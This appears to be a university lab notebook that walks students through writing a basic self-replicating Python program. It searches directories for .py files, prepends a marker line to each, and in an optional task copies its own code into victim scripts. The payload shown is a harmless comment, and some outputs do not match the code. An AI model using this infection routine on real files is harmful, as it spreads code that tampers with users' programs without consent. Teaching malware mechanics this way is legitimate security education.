<a href="https://colab.research.google.com/github/carlosfmorenog/MLCyberSec/blob/main/Example_Malware.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Malware in Python

In this laboratory, we will learn how to create a very basic malware using Python. Moreover, you will reflect on how this malware can be propagated in the virtual machine environment.

## Basic Requirements

For this activity, you are required to install the `os` python module (using `pip install os`) in case you don't already have it. Also, you need the following files:
* `victim1.py`: This script simply prints "Hello world!". If you are working locally in your computer, save it in the same directory that you are using for this notebook. Otherwise, we will load it directly from GitHub.
* `victim2.py`: This code cracks a hashed password using a brute force approach (as seen in [Example_Passwords.ipynb](https://colab.research.google.com/drive/1sLa1N09ul_RFLt0_ypAPUPZjMc_zNiR-#scrollTo=cZkF6bskp51f)). If you are working locally in your computer, save it in a subdirectory from the path where this notebook is saved (you can use any name for the subdirectory). Otherwise, we will load it directly in a subdirectory called `Data` via GitHub

Run the following cell to load the two `.py` files from my GitHub website

In [1]:
!git clone https://github.com/carlosfmorenog/MLCyberSecMalware

Cloning into 'MLCyberSecMalware'...
remote: Enumerating objects: 12, done.[K
remote: Counting objects: 100% (12/12), done.[K
remote: Compressing objects: 100% (8/8), done.[K
remote: Total 12 (delta 2), reused 8 (delta 1), pack-reused 0[K
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.


## Implementing Malware in Python from Scratch

As you know, one of the main characteristics of a malware is to insert inself into a system (usually in a secert way) with the intent of compromising a program or the whole system. In this laboratory activity, we will design a simple code in Python which will replicate itself into other `.py` files.

### Search for .py files

**STEP 1**: We will implement a function called `search` which will be in charge of exploring a directory and its subdirectories to find all `.py` files. To do so, first you need to extract the list of files and subdirectories that are located in the current directory. To do so, you can use the command `filelist = os.listdir(path)`, where `path` is the current directory.

**HINT**: If you got the data from GitHub, you can use the command `os.path.abspath("MLCyberSecMalware")`. Otherwise, you should use `os.path.abspath("")`

In [2]:
## Use this cell to
## 1) import the os module,
## 2) find the list of files/directories in the current directory and save them in a variable "filelist" and,
## 3) print filelist.
import os
filelist = os.listdir(os.path.abspath("MLCyberSecMalware"))
filelist

['Data', 'victim1.py', '.git']

If you did the instructions correctly, you should see a list of the files and folders in your current path, including `.config`, `sample_data` and `MLCyberSecMalware`, which contains `victim1.py` and the `Data` folder where `victim2.py` is saved. Moreover if you are working in your computer, you will see this notebook and a folder called `.ipynb_checkpoints`.

**STEP 2**: Using a `for` loop, iterate `filelist` to see which files have the `.py` extension.

**HINT**: When you iterate $filelist$ you are examining strings, therefore you can take advantage of the string data structure and check if the last 3 positins of any given string are the characters $.py$. Once you have found a string that ends in $.py$, remember to **add** the path of the current directory to the name of the file separated by the "/" character or the "_\_\" characters before appending to the list.

In [3]:
## Use this cell to iterate filelist and find the .py files. If one is found, append it to a "filestoinfect" list.
## In the end, print "filestoinfect".
filestoinfect = []
for name in filelist:
    if name[-3:] == ".py":
        filestoinfect.append(os.path.abspath("")+"/"+name)
filestoinfect

['/content/victim1.py']

If done have done this correctly, you should be able to append the malware and `victim1.py` but **NOT** `victim2.py`. This is due to the fact that we have only explored the current directory, but not its subdirectories!

**STEP 3**: Using a for loop, iterate once again `filelist` to **print** the names of the subdirectories.

**HINT**: You can use the command `os.path.isdir("MLCyberSecMalware/"+name)` to know if a certain name is in the filelist is a directory or not.

In [4]:
## Use this cell to iterate filelist and print the subdirectories.
for name in filelist:
  if os.path.isdir("MLCyberSecMalware/"+name):
        print("MLCyberSecMalware/"+name)

MLCyberSecMalware/Data
MLCyberSecMalware/.git


If you have done this step correctly, then you will print the subdirectories of your current path, including `Data`, the one where `victim2.py` is stored. If you are doing this excercise online, a folder called `.git` will appear, and if you are working locally in your computer, you will see a folder called `.ipynb_checkpoints`, which is autogenerated by Jupyter Notebook as an autosave.

**STEP 4**: Now that we have all of these elements, create a `search()` function which will take a `path` as an input and will return the list of files to infect.

In [5]:
## Use this cell to implement the search function.
import os
def search(path):
    # 1. Define "filestoinfect" as an empty list.
    filestoinfect = []
    # 2. Find the list of files/irectories in the specified path and save them in variable "filelist".
    filelist = os.listdir(path)
    # 3. for name in filelist:
    for name in filelist:
        # 3.a. Check if name is a subdirectory. If true, call again the search function in this subdirectory.
        # HINT: To avoid reset filestoinfect when you call the function, use filestoinfect.extend(search(path+"/"+name))
        if os.path.isdir("MLCyberSecMalware/"+name):
            filestoinfect.extend(search(path+"/"+name))
        # 3.b. Else, if it is a .py file, append it to "filestoinfect"
        elif name[-3:] == ".py":
            filestoinfect.append(path+"/"+name)
    return filestoinfect

## Use the search function in the current directory
filestoinfect = search(os.path.abspath("MLCyberSecMalware"))
print("List of files to infect:\n")
print(filestoinfect)

List of files to infect:

['/content/MLCyberSecMalware/Data/victim2.py', '/content/MLCyberSecMalware/victim1.py']


If the function was implemented correctly, then you will be able to print the malware and the two victim files.

### Infect .py files

To infect the files, you have to loop the `filestoinfect`  list and get each of the files infected. The infection consists in two steps:
1. Loading the file to be infected and storing the instructions of the `.py` file into a *temp* variable.
2. Adding the malware to the temp and rewritting the loaded file.

In [7]:
def infect(filestoinfect):
    malware = '# This file is infected by malware!\n'
    for name in filestoinfect:
        # 1. Open the file, load the instructions in a temp variable and close the file.
        f = open(name)
        temp = f.read()
        f.close()
        # 2. Open the the file in "write mode" and write the malware and close the file.
        f = open(name,'w')
        f.write(malware+temp)
        f.close()
    return

infect(filestoinfect)

Now, inspect the victim files and see if the first line of the file has the malware.
The first line of the code should be: `a="This file is infected by malware!"`

**OPTIONAL TASK**: Create a Python file called `malware.py` and paste the `search()` and the `infect()` functions. Apply the following changes to the functions:
* `search()`: Implement a mechanism that **EXCLUDES** `malware.py` from the `filestoinfect` list the file that is running the malware (**HINT**: Use a marker).
* `infect()`: Infect the victim files using **the code contained in `malware.py`** instead, so that when an unsuspected user runs a victim code, the malware keeps propagating!
* General: Print a message (for instance, "THE MALWARE IS OUT! $N$ FILES HAVE BEEN INFECTED!") where $N$ is the number of files that have been infected by the malware. (**HINT** use a counter inside the `infect()` function).

**NOTE**: Make sure that the very last line of `malware.py` is empty, so that when the code is copied into the victims, it doesn't overlap the first instruction of the victim.

In [8]:
!git clone https://github.com/carlosfmorenog/MLCyberSecMalware2

Cloning into 'MLCyberSecMalware2'...
remote: Enumerating objects: 35, done.[K
remote: Counting objects:   2% (1/35)[Kremote: Counting objects:   5% (2/35)[Kremote: Counting objects:   8% (3/35)[Kremote: Counting objects:  11% (4/35)[Kremote: Counting objects:  14% (5/35)[Kremote: Counting objects:  17% (6/35)[Kremote: Counting objects:  20% (7/35)[Kremote: Counting objects:  22% (8/35)[Kremote: Counting objects:  25% (9/35)[Kremote: Counting objects:  28% (10/35)[Kremote: Counting objects:  31% (11/35)[Kremote: Counting objects:  34% (12/35)[Kremote: Counting objects:  37% (13/35)[Kremote: Counting objects:  40% (14/35)[Kremote: Counting objects:  42% (15/35)[Kremote: Counting objects:  45% (16/35)[Kremote: Counting objects:  48% (17/35)[Kremote: Counting objects:  51% (18/35)[Kremote: Counting objects:  54% (19/35)[Kremote: Counting objects:  57% (20/35)[Kremote: Counting objects:  60% (21/35)[Kremote: Counting objects:  62% (22/35)[Kremote

In [9]:
#Now, let's run the malware!
!python /content/MLCyberSecMalware2/malware.py

List of files to infect:

['/content/MLCyberSecMalware2/Data/victim2.py', '/content/MLCyberSecMalware2/victim1.py']


You can see both files are infected by the malware in the notebook, not in GitHub!